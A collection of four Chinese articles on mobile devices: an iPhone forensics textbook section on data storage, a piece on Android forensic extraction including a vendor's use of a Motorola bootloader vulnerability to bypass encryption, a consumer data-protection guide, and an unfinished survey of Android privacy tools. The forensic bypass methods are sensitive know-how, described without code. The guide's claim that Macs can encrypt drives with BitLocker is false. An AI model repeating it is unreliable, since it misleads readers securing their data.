3.4　数据存储方式 iPhone上的数据以很多方式进行存储。下面的小节涵盖了每一个数据存储的形式以供审查者了解潜在的证据如何定位或恢复。 内部存储； SQLite 数据库文件； 属性列表； 网络； 其他。 3.4.1　内部存储 大多数的码分多址（CDMA）设备都有SD卡插槽，但是iPhone不一样，它没有任何形式的外部存储器（除了SIM卡之外）。iPhone中所有的数据都存储在内部NAND闪存中。本章后面的3.7.3节中提到的slice 2（或者称为rdisk0s2）存储了这些用户数据文件，设备的物理获取方法就是映像这部分数据。下面列出了此区域所存储的用户数据的顶层文件和目录。第6章的大部分内容集中在这些主要的目录和文件系统的其他部分。 由于所有的数据都被存储在设备内部，用从设备中获取已分配和未分配数据的方式来映像iPhone，在审查调查中是至关重要的一个手段。因为恢复已删除的短信、图片或视频通常会比较麻烦，在这种情况下，我们对用户数据分区（rdisk0s2）进行物理取证就可以轻松完成。 3.4.2　SQLite 数据库文件 SQLite数据库是常见的数据存储类型之一，受到移动应用程序开发者的广泛应用。数据库用于结构化数据存储，在多数移动系统和传统操作系统中，SQLite是较常见的数据库格式。SQLite如此受欢迎有几个原因。首先，比较重要的一点是，它的整个代码基础质量很高，开源，并且发布在公开领域。它的文件格式和程序非常简洁，所包含的重要功能只需要不到几百KB的内存。与那些传统的关系数据库管理系统（如Oracle、MySQL和微软的SQL Server）不一样，SQLite是存储在单一磁盘文件中的一个完整的数据库。任何应用程序都需要以一种有效的方式来存储和恢复数据，为了达到此目的，开发人员通常都会创建自己的私有文件格式；然而，现在大多数开发人员都转而使用SQLite，因为它免费、开源、质量好并且效率高。甚至在系统崩溃后，SQLite事务处理仍然可用。Apple开发人员在iPhone开发中大量运用SQLite数据库进行数据存储。许多常见的系统默认应用程序都以这种格式存储，比如通讯录、日历、备忘录、短信、图片、语音信箱等。这些文件中的数据分散在各个真实的数据表中。图3-2是在Mac系统上打开的，展示了SQLite数据库中SMS SQLite的数据库结构。该图中列出了所有表，处于选中状态的是Message表。 SQLite文件中的信息也可以通过命令行来恢复。在Linux Ubuntu工作站上，可以查看和修改数据库文件。使用以下命令行来打开SMS.db文件（SQLite版本3）： 一旦打开了文件，就可以用各种命令来恢复数据。例如，下面的命令用于列出此数据库中的所有表。 命令schema可查看到message表的表结构。另外，通过schema命令可以显示SQLite中的数据库建立语言。 用schema查看message表，这是了解数据表各列和列数据类型的其中一种方法。另一种查看这些信息的方式是使用前面小节提到的SQLite数据库浏览器。此软件是一个免费、开源的工具，它用于创建、设计和编辑支持SQLite的数据库文件。它可以在Mac、Linux和Windows平台上使用，且可在http://sqlitebrower.sourceforge.net下载。其他SQLite数据库的查询工具也可以在以下地址下载：http://www.sqlite.org/cvstrac/wiki?p=ManagermentTools由于在SQLite文件中能够发现的iPhone数据量很大，审查者应该将它作为重点了解，因为此数据库文件对取证审查有很大影响。第6章讲述了从这些文件恢复数据的详细过程。 3.4.3　属性列表 应用程序可使用属性列表存储、组织和访问各种iOS和Mac OS X设备上的数据类型。通常我们也称之为“plist”，这些文件由三个类的层次结构组成，所有节点显示在一个“列表”中。这三个类由以下内容组成：Cocoa Foundation、Core Foundation和XML。当属性列表以XML格式创建时，应用程序就能读取它的内容，同时可将XML属性转化为应用于Cocoa Foundation和Core Foundation的对象（Apple Inc, 2010）。XML格式的属性列表，在Mac系统上可用TextWrangler打开，内容类似于下面所展示的文本信息。此信息是com.apple.Maps.plist文件的一部分，在其中，我们可以看到经纬度坐标，其他未展示数据也很容易识别。 属性列表能以XML格式或二进制格式（二进制格式被Cocoa类操作系统层使用）存储。为了降低文件的大小，并使应用程序更高效地访问数据，Apple开始以二进制格式存储预置文件。它的高效表现在，比如，文件中重复的值仅需存储一次，且后续需要时可在文件中引用。同时，数据以字节形式存储而不是字符串。而对于二进制plist文件（或者bplists）如何能降低属性列表的大小只有很少的例子（Caithness, 2010）。如果属性文件是XML格式，可以用任何标准的文本编辑器查看此文件。如果以二进制形式存储（本质上来说这是XML plist更简洁的版本），就必须用能够进行ASCII码转换的应用程序才可打开。Plutil，是“property list utility”（属性列表分析）的应用程序之一。当工具读取的是属性列表文件时，它可将plist文件进行二进制和文本格式转换。它还能扫描属性列表文件并检查该文件是否符合XML语法。plutil是一个纯粹的命令行驱动工具，它可以运行在Windows、Linux或者Mac OS X平台上（PERL，2008）。默认情况下，plutil安装在Mac的/usr/bin/plutil目录下。你也可通过Internet下载Windows和Linux版本的plutil软件。二进制plist文件在转换之前是不可读的，只能看到一些“bplist00”，后面跟着任意数量的不可辨识字符。使用plutil工具下面的命令行，可将二进制plist文件转换成ASCII格式： 运行下面命令，可将XML格式转换成二进制格式： 这两条命令没有任何的输出，当用户尝试打开文件时，文件的格式已根据运行的命令转换成二进制格式或XML格式了。另一个可用于属性列表文件的有用选项是“-lint”。在命令行中加入这个选项，用户可以查看plist文件是否存在语法错误： 属性列表中的数据有不同的类型，包括字符、数字、二进制数据、日期以及布尔值。属性列表文件由三个类的数据组成，因此这些数据必须使用三种不同的方法表示。不同的数据类型以及给每个类的表示方法如表3-1所示（Apple Inc., 2010）。 特别是在iPhone中，设备中的应用程序通常通过属性列表来呈现给用户一些选项。尤其是像Safari Web历史记录和书签、YouTube数据、Favorites（收藏）以及很多个性化文件都存储在属性列表中。属性列表的使用简化了应用程序的开发。程序员能够使用这些配置文件来修改应用程序的特性和功能。简单地修改plist文件并且将其更新到设备上就可以修改应用程序。关于二进制和ASCII格式的plist文件的更多细节，可参考CCL Forensics中描述的“数字取证中的属性列表”。这篇文档包含了属性列表的历史由来，XML和二进制格式的结构，这两种格式相互转换的算法，以及如何分割和解析属性列表文件及其内容。 3.4.4　网络 网络提供给开发者的另一个选择是将数据存储在“云”中，而不是将数据直接存储在设备本身。起初，只有很少的应用程序会利用网络来存储，然而，随着设备和应用程序的成熟，网络存储已经得到充分应用。iTunes应用商店中的许多应用程序都允许文件共享和网络访问，例如My Network Folders、Air Sharing、QMobile和Dropbox。这些应用程序以几种方式运用网络存储。一种方式是允许设备通过Web浏览器来上传和下载已存储文件。另一个方式是将设备连接到计算机，将它作为一个驱动器挂载，然后复制文件到设备或从设备复制文件。例如文件共享应用Dropbox，它已经成为广受欢迎的文件共享网站，这个网站提供iOS、Blackberry以及Android设备的移动应用程序。Dropbox的最新版本是1.3版本，该版本于2010年10月10日更新，已获得超过1100个好评。在安装和使用之后，所有用户活动都存储在“Applications”文件夹。关于这个特别应用程序的更多分析细节参见第6章。

今天，我将会介绍一些其他的Android设备的物理取证方法。前两次的分析，你可以点此（1.2）详细了解。 对摩托罗拉智能手机的取证 Oxygen开发了一种基于bootloader级别的CVE漏洞的技术，该技术允许使用Oxygen Forensic Suite的取证专家成功绕过2015年至2017年间生产的部分摩托罗拉智能手机的加密保护。其中包括Moto X，许多Moto G的升级版本，包括G5，Moto Z和Moto Z等等。一旦专家将兼容的摩托罗拉智能手机以“快速启动”模式连接到PC，并在Oxygen Forensic Extractor（取证套件的一部分）中选择“Motorola”选项，就会自动调用漏洞。 利用Oxygen Forensic Suite的优点 1.此方法可以轻松从未加密的摩托罗拉设备中提取数据； 2.通过快速启动模式进行工作的独立芯片组； 3.如果未设置密码或密码已知，则可以提取加密设备的数据，不过在此情况下，必须在取证期间指定密码； 4.支持Android 7.0 利用Oxygen Forensic Suite的缺点 1.所针对的型号有限； 2.即使是支持的手机型号，也要看具体版本，例如，支持Moto G 2的World版本，而对同一型号的Verizon变体则不支持； 3.即使存在漏洞，也不支持所有版本的软件； 4.仅限于在2017年5月之前打过安全补丁的手机； 目前，Oxygen Forensic Suite手机取证分析工具正在被世界各地广泛使用，客户现在已经涉及众多行业，有各个执法部门、警局、军队、海关和税务部门，此外还有其他一些政府部分也开始使用。另外，它对iPhone手机也有着强大的取证分析能力。除了能够取得同类取证产品可以获得的通用数据外，Oxygen Forensic Suite可以读取出更多的特有的信息。我们采用了底层的通讯协议，可以获取到：手机基本信息以及SIM卡信息、 联系人列表、组信息、快速拨号、未接/打出/打入号码、标准位置的短信息/彩信/电子邮件文件夹、自定义的短信息/彩信/电子邮件文件夹、删除的短信息(包含一些限制，支持部分型号)、短信中心时间戳、日历/日程、代办事宜、文本便签、照片、视频、音频、LifeBlog 数据 (所有活动，包含地理信息)、Java 程序、手机内存和闪存卡中的文件系统数据、GPRS和Wi-Fi使用纪录、录音文件、以及更多的信息。 对Android设备进行物理取证的其他方案 通过以上了解，我们可知，对手机采用多么高难度的加密，都会被破解。因此，随着全盘加密，基于文件的加密，安全启动和正确实施的安全启动链，即使手机运行的是过时的Android版本，例如Android 6.0，传统的物理取证方法也已经不可用。但你有没有想过，是否有人能够通过锁屏方法来进行取证？Android中许多优秀的安全措施往往被用户忽视，或者通过使用某些不太安全的措施进行保护。目前Android Smart Lock是可以对设备的整体安全性产生严重影响的功能之一。 如果取证人员能够越过锁定屏幕这个过程，则可以通过生成本地备份来尝试进行逻辑读取。与iOS相比，Android本地备份非常复杂。从Android 5.0开始，使用“adb backup”生成的备份包含比以前少得多的数据。至于其中有多少是对备份和恢复设备有用的内容，则还不一定。如果使用“adb backup”是你取证的最后手段，它总比没有好。如果你可以将账户中可以通过MTP轻松访问的“sdcard”内容进行挂载，那么总比什么都没有要好。但是，许多Android OEM都提供了他们自己的备份和恢复设备的解决方案。 以小米为例，如果被取证的设备不是最新通过谷歌认证的版本，则通过手机上的MIUI内部工具进行的本地备份将包含手机中的所有内容。其中，就包括沙盒应用程序数据，该数据是开发人员明确禁止备份的应用程序。而对于最新被谷歌认证的设备（如小米Mi Mix 2），它们似乎能很好保护开发者设置，并且任何人都无法备份不允许备份的应用程序。 另外，LG，三星，华硕和索尼都有自己的备份解决方案。有时候，这些解决方案仅适用于某些设备或特定版本的Android。一些制造商（例如三星）甚至还有好几种工具来备份不同型号的手机内容。如果你可以使用其中一种工具，那“adb backup”方法就可以不用考虑了，因为你可以访问更多的数据。有趣的是，一些提供本地备份工具的制造商会对“adb backup”中包含的取证命令实施了加更严格的限制。 最后，如果设备根本无法进行物理访问，该怎么办？如果是这种情况，你仍然可以通过直接从用户的谷歌帐户获取数据来执行云端取证。因为谷歌云端的有关用户和商店服务器上的数据量实在是太多，实际上，即使你可以执行文件系统转储，那与从云端获取的数据相比，都是九牛一毛。 总结 虽然，目前市面上的几家大型取证服务商，都号称他们可以对数以千计的手机进行取证分析，但由于加密技术的不断提高，他们提供的这些方法能成功提取Android智能手机信息的概率也会越来越低。虽然存在一些位于某一类手机上的加密漏洞，但这些方法并不是通用的，并且通常仅适用于没有进行安全启动的FDE智能手机。任何其他配置的手机在取证时，都需要输入设备本身的密码，即使设备位于取证服务商的广告中所支持的型号列表中，也可能会出现取证问题或根本不可能进行取证。 那么，加密的Android设备是否安全？只能说，与iPhone（例如iPhone 7, iPhone8和iPhoneX）相比， Android智能手机相对不太安全。 原文发布时间为：2018-06-8 本文来自云栖社区合作伙伴“嘶吼网”，了解相关信息可以关注“嘶吼网”。

WannaCry爆发之后，三天就锁住超过30万台Windows电脑，据说造成80亿美元损失。 你不难在社交网络上找到毕业论文被锁住，没法交作业的抱怨。当然具体是怎么一回事就只有当事人自己知道了。 这不是唯一针对你的数字世界发起的攻击。IBM去年年底一份报告说，大约40% 的垃圾邮件中都包含恶意程序。 不止是电脑，Android病毒的类型也已经超过3000万种。 被认为更安全的iOS也曾被攻破，苹果去年紧急打了补丁。这次WannaCry就有攻击苹果操作系统的可能，苹果随后提供了23个iOS和macOS的安全补丁。 而互联网公司自己造成的安全问题也没消停过。今年初，有人发现支付宝在某些情况下可以修改好友的账号密码。通过“选好友”和“选买过的商品”之后，就能顺利登录然后用二维码付款消费。 58同城也出现过简历泄露事件，700元就可以采集全国的简历；优酷遭遇过“上亿用户账号”的泄露。 金钱损失和隐私泄密以外，照片丢了、工作的文档、之前收集过的文件……都广泛存在着丢失和泄露的风险。你也许有过经历，一旦出问题就会带来很大的麻烦。 我们今天已经很难摆脱数字化，不管财产损失还是数据丢失，都是件麻烦事。 一般人出门会锁门、从银行取了捆钱知道不要捧在手上往外走。数字世界里也一样，没有理由不去保护自己的数字世界。 值得保护的数字信息大致可以分为四类： 1. 和钱有关的。可能是信用卡、网银、支付宝，也可能是购物网站的密码。 2. 重要的隐私。私密照片、身份信息、聊天记录……没人想让这些东西落入别人的手里。 3. 工作和生活积累的成果。从过去拍的照片到熬夜做出的PPT。 4. 没那么重要，但丢了会让你不爽的东西。这可能是攒了好多年的电影，也可能是花钱配置好的软件。 最基本的是微信、支付宝、银行账号不出问题。裸照不被传得到处都是。 最理想的是即便手机、电脑莫名自燃，你也可以在一小时内把新手机、新电脑变得和之前一摸一样，不用浪费一两天在装软件、拷数据上。 我们推荐这7个包含工具推荐的方法，大多不会占用太多的学习成本。 【管理密码还是最重要的，但可以抓大放小】 在线支付已经足够方便，尽管各种和支付有关的服务都有更严格的安全机制，但还是会有像支付宝密码Bug这样的事件出现。 一个关于密码的迷思是，为了让自己记得清楚，我们倾向于把账户设置成相同或相似的密码。有时候为了便于记忆还会加入包含个人特征的字母和数字，比如生日或者电话号码。但这显然不够安全。 复杂的密码会提高安全性，但也不能一直用着。密码的使用习惯比密码本身重要。 重要的服务不要和其它服务使用同样的密码 大部分的密码泄漏并不是一个黑客盯着某个特定用户，而是整个互联网服务的密码库泄漏。这个你很难避免，网易邮箱、雅虎账号都出过问题，它们可都是十几年历史的科技公司。 你可以做的是，划分服务的重要性，确保最重要的几个服务的密码不是太蠢（比如password、12345678、自己生日，或者手机上4680解锁），否则互联网公司再大的安全投入也没法保护你。 许多人是两三个密码用在所有服务上，这样丢了一个就让其它服务置于危险之中。 我们不用费力保护每一个服务，一些不重要的论坛、网站用同一个密码问题也不大，但最核心的几个服务需要有独立的密码。比如微信和支付宝，它们可能已经掌管了你大部分的财产和社交关系。再比如网银、工作邮箱。 注册这些互联网服务的时候尽量用邮箱，而不是更方便的手机号登录。当手机号和其它个人信息一同泄露，有可能帮助诈骗者编出更好的故事。 大多数公司的短信验证都调用第三方服务，即便你相信自己注册的服务品牌，也没理由相信提供短信验证的公司。 即便用到邮箱注册，也尽量避免使用和邮件相同的密码。比如为了看网络小说注册的账号和163邮箱用同一个密码，一旦发生撞库就会有很大风险。Dropbox就曾经重置了一大批用户的密码，这不是因为它自己的安全问题，是用户自2012年以后就没改过密码，Dropbox认为他们的账号有被撞库侵入的风险。 如果你会科学上网，用Gmail来注册重要的服务还是很必要的。 密码托管谨慎点，或者用指纹 密码一多、还要经常更换，难免会忘。 如果你愿意，可以用1Password和LastPass这两个密码管理工具，它们会帮你生成巨复杂的长串密码、支持各种应用和网页的自动填写。 它们其实也都遭到过攻击。LastPass曾经两度承认遭到了黑客攻击，导致部分用户主密码泄露。 1Password的好处是，你可以选择把数据留在自己的手机、电脑上，不通过它提供的服务同步。这样即便1Password网站被攻破，也不会影响你的密码安全。 如果不想用复杂的服务，记纸上也比桌面上放个txt文档安全。（当然，有点技巧，比如只记录密码，不记录服务名称和邮箱） 如果你使用指纹识别手机，也可以考虑尽量用指纹登陆、支付。现在不少应用已经支持指纹。 这不是为了安全，是为了省事。 开启两步验证 同样的，不少服务也已经使用了两步验证或者授权验证登陆。尽管通过短信的两步验证也有被攻破的风险，但有它远比没有安全。 苹果除了互联网产品上常见的两步验证，还在旗下产品上启用了two-factor双重设备验证，引入硬件加密。 当你在其它地方登陆Apple账户的时候，双重设备验证会往你指定的硬件产品上发送验证码才能继续登陆。相比通过传统的两步验证，双重设备验证更加安全。 确保手机号是新的，不要在应用以外输入验证码 使用微信和支付宝，很重要的一步是确保你绑定的手机号可以用。 这是一个经常被忽视但是重要的部分，一旦密码忘记你需要这两种渠道追回密码。所以记得保证它们时时畅通、经常更新。哪天忘了密码的同时发现绑定的手机号也早就不用了，问题就会变成一个难以解决的死循环。 如果你停机，过几个月运营商会把号码给别的用户，一不小心对方可以拿到你的账号，而你只能走繁琐的申诉流程。 另外，也不要回复任何类似验证码的信息，有用户被人利用验证码的回复攻破了手机号码，偷走了所有存款。 尽量少在网页上交易 不用网页的原因在于，有人会用一个钓鱼网页伪装成淘宝或者京东，不加辨别你就可能把钱划给小偷。 你经常使用、一直还活跃的电商其实不多，下载它们的应用相对比较安全。 偶尔需要支付的，最好是跳转到支付宝、微信支付，不要在网页上直接输入卡号。凯悦酒店集团的系统就被黑客攻破过，数百万客户的信用卡卡号和CVV码（卡片背后的3-4位安全码）泄露，这足以让黑客制卡盗刷而不需要支付密码。 如果要海淘，用支持PayPal或者Stripe支付的网站，你的信用卡信息也会更安全一点。 对于不常用的海外互联网服务，可以考虑买充值卡消费——同样是为了减少信用卡信息泄露。 信用卡管家和自动记账工具都要谨慎 至于信用卡的使用，你可能已经有一套熟悉的使用习惯。但集合了多张信用卡的信用卡管家应用其实并不安全。 信用卡只要有卡号、有效期就能在线支付，美国亚马逊这样的网站甚至不用背面的安全密码。 而用信用卡管家就像把所有鸡蛋放在一个篮子里，你的信用卡会全部被暴露在风险之中。 最保险的当然是用银行的官方应用。如果觉得这些官方应用实在太难用，可以试试官方微信公众号，目前大部分银行都在公众号里添加了查询账单等等简单的功能。 或者还款的时候使用支付宝，它现在也能通过邮箱查账单，还会帮你整理还款记录。 同样的还有各种自动记账的理财应用。它们没能争取到很多银行的合作，有些在同步数据时让你手动输入收到的网银验证码——它的系统记录了你的密码，直接用这些密码登录网银。 和信用卡管理软件的问题一样，把银行账号、密码交给它们，对你没多大帮助但风险却大了很多。 【照片不要备份在移动硬盘里】 在所有日常所有的电子资料里，照片可能是你存在手机或电脑里量占储存空间最多而且最看重的资料。 它是一堆平日里被你存在手机或电脑里，但可能又不会太在意的数据。但哪天要是手机或电脑真丢了或者出问题，又没有做好备份，只能追悔莫及。 备份到移动硬盘不是个好选择。移动硬盘数据损毁的可能性远远高于大科技公司数据中心丢失数据的可能性。今天几乎所有做云计算的公司都在多个地理位置备份数据，确保地震、海啸之类的重大事故也不会影响用户存储的信息。 对于这部分信息，一个比较好的建议是储存在云端。 当然把照片上传本身也是有风险的，只能说把它们存到一个相对安全的地方。所以，如果你有极其隐私的照片，最保险的还是删掉吧。 如果你是iPhone用户，把照片同步到iCloud中就可以了。每个月多花6元，iCloud能提供50 GB的云存储空间，对于手机里的照片量来说这个存储空间就差不多够了。 国内Android手机厂商基本也都提供了照片同步备份。需要担心的是你买的手机品牌是不是能一直活下去。所以除了它们的备份，还需要借助其它服务。 目前中国境内的网盘服务不太稳定，从去年开始微盘、115网盘、360云盘等网盘就在陆续关闭。同时它们在数据隐私方面也不值得信赖。 Google Photos是相对保险又易用的选择，它禁止了搜索引擎搜索到你存到云端的图片等信息链接，使用上也很方便，可以自动同步手机里拍摄的照片，并分类上传。默认状态下这些照片都按原来的比例上传到你的Google账号中。 　　【身份信息，比你想象中更容易被别人拿走】 智能手机比以往的任何设备都更全面地渗入了人们的生活。这个每天都待在口袋里的设备，能够在你意想不到的情况下将你的隐私信息泄漏出去。 关于怎么保护互联网隐私和习惯，这里有一个知乎高票回答事无巨细地列举了密码的使用场景，有时间可以研究一下用做参考。 不要图省事用Wi-Fi应用 Wi-Fi万能钥匙看起来是个方便的工具。它的原理很简单，有用户使用时，应用会收集这部设备连接过的所有账号密码，并存储在云端供所有用户使用。其他人遇到密码库中的Wi-Fi账号就能自动填充密码连接上网。 但方便的代价是隐藏的风险。一旦你允许万能钥匙自动联网，就等于把设备暴露在复杂的环境之中。不知道什么时候就会连接到含有隐患的公共Wi-Fi 。 与此同时，如果不特别设置，你自己家的Wi-Fi也会被收录在这个巨大的密码库当中。 出门用手机热点上网的成本已经很低，比如现在联通日子不太好过，它为了吸引用户和多家互联网公司合作了低价SIM卡，可以低至每GB 1元。这更省事，也比公共Wi-Fi更安全。 涉及到身份信息都留个心眼 很多互联网服务已经需要实名认证，但其实在不是必须项的时候，你可以不用那么诚实。 注册各种账号的时候如果实在不想用邮箱注册，微信能提高安全性。这是因为它的登陆系统只授权名字和头像，对方能获得的信息比较少。 哪怕有时候必须留电话号码，你也不必留真实的姓名。同样的道理，网购时别把全名写上，避免它和你的电话住址一同出现。目前已经有电商和快递公司支持匿名购买、匿名物流，快递单上没有真实姓名并不影响你收货。 还有，办理各种证件的时候往往需要复印身份证、户口本、护照等等证件，在复印件的关键位置标注上这张纸的用途，也就能有效避免别人拿去用作它用。 街边经常有各种名义的问卷调查，比如招聘、银行办理业务、健身房优惠……这种情况可以谨慎一些，不得不填的时候就写个假的。 安装应用前，看一看应用权限 在手机上，应用想要获取信息也必须要经过你的同意，所以安装应用的时候别闭着眼就点“确认”，多花一点时间看一下应用的权限列表吧。 iOS上，当应用提示说需要读取你的联系人资料或者地理位置信息的时候，想一下自己用这应用的时候，是不是真的需要让它看到这么多。 【聊天也是可以备份和加密的】 　　还有一项被我们忽略却容易产生风险的数据：你每天都产生的聊天记录。 微信是需要你自己备份的 微信可能已经装下了你大部分的社交关系，你会发现它占据的内存容量日渐膨胀，这不是没有理由——通讯录、聊天记录以及各种文件，微信保存着你大量的隐私数据。没人希望这些隐私遭到泄露。 但微信并不能自动、长期把记录上传到云端，只有一个“迁移”功能，需要保证你两台设备都完好无损。这意味着意外发生时比如手机丢失、系统崩溃，聊天记录就不复存在了。 如果你想保存宝贵的聊天记录，其实有一些选择。 最方便的是微信电脑客户端，今年Mac和Windows的版本都增加了备份到电脑的功能，你可以用它上传或恢复手机里的聊天记录。 腾讯自家的“电脑管家”有保存微信记录到电脑的选项。遗憾的是这个功能目前只支持Android手机备份至Windows系统。如果你用iPhone，可以用iCloud Drive备份整个微信应用。 iPhone用户还可以选择WeBack，这是一个收费的Mac应用，可以把聊天记录导出为网页。可能很适合导出和ex的点点滴滴。 如果你对安全特别在意，微信以外有很多选择 即时通讯应用Whatsapp和Telegram采用了端对端加密的方式，可以保证安全。 隐私保护做的最好的应该算WhatsApp ，2016年WhatsAppp做了一次大的更新，将所有的服务包括消息、通话、视频、群聊等都进行了加密，并支持所有的手机系统，包括iOS、Android、黑莓等。 这种端对端的加密方式能确保只有用户和消息接受者能读取信息，其他第三方包括WhatsApp都不能看到用户的聊天内容，每一条消息都会生成唯一的安全密钥和安全锁。 它曾经被Amnesty International（大赦国际）评选为最安全的即时通讯应用。 如果你担心扎克伯格为了进中国市场做什么奇怪的事，不妨选择排名第二的Telegram（iOS丨Android），它由一家俄罗斯一家非盈利机构开发，并承诺不卖广告。Telegram同样也采用了端对端的方式对用户的聊天内容进行加密。 去年它宣布用户量破亿，还在去年11月推出了匿名博客，如果用户更换浏览器或清理缓存，发布者的信息将完全追踪不到。 不过跟WhatsApp不太一样的是，目前使用Telegram还需要掌握了科学上网的方法之后才能使用。 类似的还有Signal，这家通讯应用一直致力于对抗各个国家的应用审查，用它打电话发信息都是加密状态，还需要双方输入一个密码才能联通。 【工作文档，最好同步到云端】 为工作和学习保管的文件，一旦丢失可不是感到遗憾那么简单了。就像这次的WannaCry病毒，实际上如果平时有自动备份文档，锁住一台电脑问题也不大。 工作文件还是同步保存比较好 如果你是Windows用户，比较简单的一个办法是使用微软自带OneDrive服务。 你只用将需要经常备份的文件存在OneDrive （iOS丨Android）里，新增的文件会跟着自动同步到你的OneDrive中。此外，它自带的笔记本应用OneNote的数据也会自动上传储存在OneDrive中。有个问题是，除了OneNote文件更新效果还不错外，它的文件更新效果并不太理想，有时候你的文件不一定能同步成功。 想要自己的文件同步更保险一点的话，可以再下载一个Dropbox（iOS丨Android）。使用方法跟OneDrive类似，申请了账号之后，将需要备份的文件夹拖入Dropbox的客户端或者网页版的文件页面就能完成备份了。之后如果你在这个文件夹里新添加的文件都会备份到Dropbox中。 它跟OneDrive都带有分享功能，只要在“共享”页面添加需要分享人的邮箱就可以了。同步后你也可以随时通过手机查看文件。不过它们都需要你掌握科学上网的办法。 想进一步研究笔记应用的话，这里还有一份包含20个工具的使用指南。 什么都可以备份 今天基本什么都可以备份。我们之前做过一期Hack Your Life专门谈这件事。 除了传统的文档和照片以外，游戏、音乐、电影也都可以通过相应的服务解决。 【整个电脑的备份，也可以定期做一下】 　　手机和电脑都有备份都办法 一旦出现意外需要更换设备时，你可能希望新设备一打开就变得和原本那台一模一样。这需要在平时时常做备份。 现在，要备份手机上的东西并不需要在电脑上打开各类手机助手、再将手机和电脑连上，大部分的手机厂商已经在系统内置了备份程序，比如iPhone的iCloud、小米的小米云服务等。 只要手机有足够的电量，并且连着WiFi ，就能快速上传通讯录、短信等资料，照片、应用之类的备份通常也都包含在其中。 等到更换设备，云端的备份会自动把这些内容同步到新手机上，甚至应用产生的使用数据。 如果只是想备份通讯录，可以直接用微信的通讯录同步助手。反正不管怎么样你都会让微信扫描你的通讯录，反正换手机后都会再装微信。 鉴于可用的网络云盘服务越来越少、它们本身也并不安全，如果你的备份需求比较高，我们建议还是放一份到本地的电脑上，再给电脑做备份。（也就是备份的备份……） 如果用Mac电脑的话，你可以很方便地用Time Machine备份整个电脑的数据。中间差了几天，也可以靠互联网服务自己的同步功能补上。 移动硬盘备份前，记得加密 移动硬盘的确不是备份的最佳选择，如果把全部家当都存放进去，硬盘本身一旦丢失、损坏、被盗走，等于所有资料倾家荡产。 况且有时候它也会犯毛病连不上电脑什么的。 如果一定要用，它可以在之前的几种备份方法之外充当补充，但记得给硬盘加密。现在希捷、西部数据等主流的品牌都自带加密功能。 如果你使用Windows操作系统，把硬盘连接后可以用自带的Bitlocker对文件做加密处理，不需要第三方软件。 Mac本身也可以通过Bitlocker加密硬盘，这能避免别人绕开操作系统看到电脑里的东西。 【最后也是最基本的，升级你的系统】 对Wannacry病毒来说，其实感染前的一个安全补丁就可以有效把它拒之门外，病毒的攻击正是基于Windows的系统漏洞。就好比疾病疫苗，你需要在病发之前就有准备。 iOS越狱和关闭Windows软件更新的一个危害就是没法及时更新，这是危险发生后最及时有效的处理方式。 收到提示后及时升级操作系统吧，不然厂商的安全人员再努力也架不住你不升级系统。 本文转自d1net（转载）

IPHONE/IPAD的IOS的隐私保护，曾经让我这种玩Android的穷人急红了眼。1、总线控制型的第三方工具在2011年，Android的隐私保护只有PDroid。PDROID可以给每个程序分别设置MAC、手机号、机器码。PDROID工作原理和IOS相似，在驱动链（chain）上加个节点（node）控制所有程序的请求，同时提供个GUI前端进行具体设置。它可以控制Android v2.x上的。IMEI(可伪造)、IMSI(可伪造)、SIM卡序列号(可伪造)、手机号码(可伪造)、来去电号码、SIM卡信息、当前蜂窝网络信息、GPS定位信息 (可伪造)、基站定位(可伪造)、系统自带浏览器的历史、书签、联系人、通话记录、系统日志、日历 、当前账户列表、​当前账户的授权码、短信彩信……Pdroid在谷歌商场有提供了官方介绍，并且给出了xda的官方链接。相比之下，好像所有的隐私保护工具都弱暴了。对一般的安粉来说，Root不是大问题；问题是PDroid必须使用不加密的framework（说明硬件和结构的文件）。HTC ／Moto等等知名厂商都有bootloader lock和framework encryption。如果不加密这些文件，不仅终端安全就暴露在暴徒手下，关键是hacker可以直接给手机解锁、解除各种SP绑定了（喔 RMB USD UKP … 各种钱财啊），重写android系统（是开源的）也都不是问题了。厂商不加密Framework才怪！这种局限 丝毫不影响Pdroid的跨时代地位。Pdroid的作者后来放弃了这个项目，后来XDA的大师们继续为它做更新，并且推出了新的项目OpenPDroid。是的，我手头的设备都加密了framework.apk（同目录下存在framework.odex就是加密特征）。我望洋兴叹很久、很久、很久……2、APK为核心的阶段后来，APK的自动化重打包技术成熟。逐渐出现了删除程序API（例如删除访问GPS功能）、修改API返回值的各种工具。例如直接禁用接口功能的APK权限修改器。不过，禁用／删除接口有可能会造成程序不能正常使用。举例说，很多程序启动的时候就要访问硬件ID，停用这个功能之后，修改后的APK会直接挂。强制某些接口的返回值为固定值（NULL等）的工具同期问世。例如洗大师，但是它必须将APK上传到服务器修改、并且必须保留修改程序才能使用修改后的APK。不知道是不是多数用户可以接受呢？俺是不用了。顺便推荐一下著名的LBE。实际上LBE问世很早，但是出于资源和性能的考虑，我没有使用过LBE。近来，LBE没有以前那样受欢迎。要在这里说明的是LBE用的技术比较复杂，应该不只修改APK、加入调试这么简单。本文只是把它放在这里，分类可能不准确。此外也有LBE Privacy Guard (不​需要root，2012年问世）。应该是标准的APK修改工具。其实还有Permission  denied，下线了。Privacy Blocker 停止更新​了……3、谷歌重视的官方关注Android是谷歌与Apple竞争的平台。谷歌当然会重视隐私安全。谷歌随后在Android 4.1推出了APP OPS (程序，对不起啦）功能，并且可以在设置面板里直接限制程序访问隐私的权限。这个功能在AOSP版本的Android里直接可以看到，但是官方仅在4.3里实现了前端GUI-App Ops Starter。我们看到了App Ops类似于iOS6~7的隐私保护,它控制了下列功能：位置读/写联系人*读/写通话记录*收/发短信*拨打电话发送通知(已经在4.1实现)在(包括其它应用程序的Activity之上的)顶层绘制修改系统设置(指开启蓝牙，GPS，Wlan等项目，具体包括哪些API不清楚)震动拍照(使用摄像头)*录音*读/写剪贴板*读/写日历*android的实现方法比较体贴！Framework大家都加密，可是隐私必须保护，所以(据说)Android在app_process, 即Java程序的launcher上实现了参数传递的功能。即是说，app_process可以从配置文件里读取参数，选择性的屏蔽部分API的功能（应该是返回Null）。App Ops的Activity已经在AOSP代码库(2013-8月份)的一次Commit里被注释掉了，也就是说在可见的未来里，App Ops应该不会出现。所以……呢4、粉丝们的后现代主义时代我不想多说什么官方不官方的，因为粉丝早比我疯狂。最让我着迷的恐怕是XPosed.XPosed（要Root）修改了App_process并且在dalvik添加了个层（我认为还是节点），可以说它hook了几乎整个系统。Xposed框架是一款可以在不修改APK的情况下影响程序运行（修改系统）的框架服务，基于它可以制作出许多功能强大的模块，且在功能不冲突的情况下同时运作。当前，Per APP Setting（为每个应用设置单独的dpi或修改权限）、Cydia、XPrivacy（防止隐私泄露）、对原生Launcher替换图标等应用或功能均基于此框架。XPosed的App 